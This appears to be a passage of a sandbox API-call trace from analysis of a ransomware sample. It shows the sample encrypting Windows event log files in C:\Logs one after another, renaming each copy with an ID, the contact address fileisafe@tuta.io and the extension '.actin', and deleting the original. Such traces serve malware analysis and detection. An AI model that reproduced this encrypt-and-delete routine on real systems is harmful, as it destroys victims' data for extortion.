[0060.147] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\key management service.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.147] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72000) returned 1 [0060.147] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.147] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.149] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.149] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0060.151] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72040) returned 1 [0060.151] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.151] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60, dwBufLen=0x60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60) returned 1 [0060.151] CryptDestroyKey (hKey=0xf72040) returned 1 [0060.151] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x112, lpOverlapped=0x0) returned 1 [0060.151] CryptDestroyKey (hKey=0xf72000) returned 1 [0060.151] CloseHandle (hObject=0x324) returned 1 [0060.151] CloseHandle (hObject=0x300) returned 1 [0060.153] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 1 [0060.154] SetEvent (hEvent=0x2e8) returned 1 [0060.154] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.154] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.154] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.154] CloseHandle (hObject=0x300) returned 1 [0060.154] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 0x20 [0060.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.155] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.155] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.155] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.155] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.155] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e40) returned 1 [0060.155] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.155] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.534] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.534] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0060.536] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b00) returned 1 [0060.536] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.536] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0060.536] CryptDestroyKey (hKey=0xf71b00) returned 1 [0060.536] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0060.536] CryptDestroyKey (hKey=0xf71e40) returned 1 [0060.536] CloseHandle (hObject=0x300) returned 1 [0060.536] CloseHandle (hObject=0x324) returned 1 [0060.538] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 1 [0060.540] SetEvent (hEvent=0x2e8) returned 1 [0060.540] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.540] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.540] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.540] CloseHandle (hObject=0x324) returned 1 [0060.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 0x20 [0060.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.540] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.541] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.541] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.541] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.541] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71fc0) returned 1 [0060.541] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.541] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.542] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.542] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0060.544] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0060.544] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.544] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0060.544] CryptDestroyKey (hKey=0xf71b80) returned 1 [0060.544] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0060.544] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0060.545] CloseHandle (hObject=0x324) returned 1 [0060.545] CloseHandle (hObject=0x300) returned 1 [0060.546] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 1 [0060.548] SetEvent (hEvent=0x2e8) returned 1 [0060.548] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.548] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.548] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.548] CloseHandle (hObject=0x300) returned 1 [0060.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 0x20 [0060.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.548] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.548] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.548] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.548] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.549] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71dc0) returned 1 [0060.549] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.549] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.550] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.550] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0060.553] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71fc0) returned 1 [0060.553] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.553] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0060.553] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0060.553] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0060.553] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0060.553] CloseHandle (hObject=0x300) returned 1 [0060.553] CloseHandle (hObject=0x324) returned 1 [0060.555] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 1 [0060.556] SetEvent (hEvent=0x2e8) returned 1 [0060.556] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.556] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.556] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.556] CloseHandle (hObject=0x324) returned 1 [0060.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 0x20 [0060.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.557] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.557] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.557] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.557] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.558] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e40) returned 1 [0060.558] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.558] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.559] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.559] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0060.561] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0060.561] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.561] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0, dwBufLen=0xa0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0) returned 1 [0060.561] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0060.561] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x152, lpOverlapped=0x0) returned 1 [0060.561] CryptDestroyKey (hKey=0xf71e40) returned 1 [0060.561] CloseHandle (hObject=0x324) returned 1 [0060.561] CloseHandle (hObject=0x300) returned 1 [0060.563] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 1 [0060.564] SetEvent (hEvent=0x2e8) returned 1 [0060.564] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.564] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.564] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.564] CloseHandle (hObject=0x300) returned 1 [0060.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 0x20 [0060.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.565] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.565] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.565] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.565] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.565] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71cc0) returned 1 [0060.565] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.565] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.851] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.852] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0061.003] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f80) returned 1 [0061.003] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0061.003] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0, dwBufLen=0xa0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0) returned 1 [0061.003] CryptDestroyKey (hKey=0xf71f80) returned 1 [0061.003] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x152, lpOverlapped=0x0) returned 1 [0061.003] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0061.003] CloseHandle (hObject=0x300) returned 1 [0061.003] CloseHandle (hObject=0x324) returned 1 [0061.005] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 1 [0061.007] SetEvent (hEvent=0x2e8) returned 1 [0061.007] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0061.007] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0061.008] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0061.008] CloseHandle (hObject=0x324) returned 1 [0061.008] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 0x20 [0061.008] GetFileAttributesW 